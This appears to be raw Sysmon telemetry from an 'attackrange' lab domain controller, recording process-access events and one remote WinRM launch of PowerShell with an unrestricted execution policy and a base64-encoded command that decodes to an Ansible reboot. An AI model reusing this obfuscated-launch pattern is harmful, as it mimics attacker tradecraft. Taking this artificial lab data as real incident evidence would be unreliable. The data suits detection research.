10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0B03-000000007E01}4364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3DD6-5F80-0703-000000007E01}47884780C:\Windows\system32\WinrsHost.exe{733EE690-3DD6-5F80-0B03-000000007E01}4364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.433{733EE690-3DD6-5F80-0B03-000000007E01}4364C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-A6AA-110000000000}0x11aaa60HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.249{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.249{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.218{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_d4ogs2xc.c41.ps12020-10-09 10:39:18.218 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.203{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3DD6-5F80-0803-000000007E01}39323388C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0A03-000000007E01}5100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 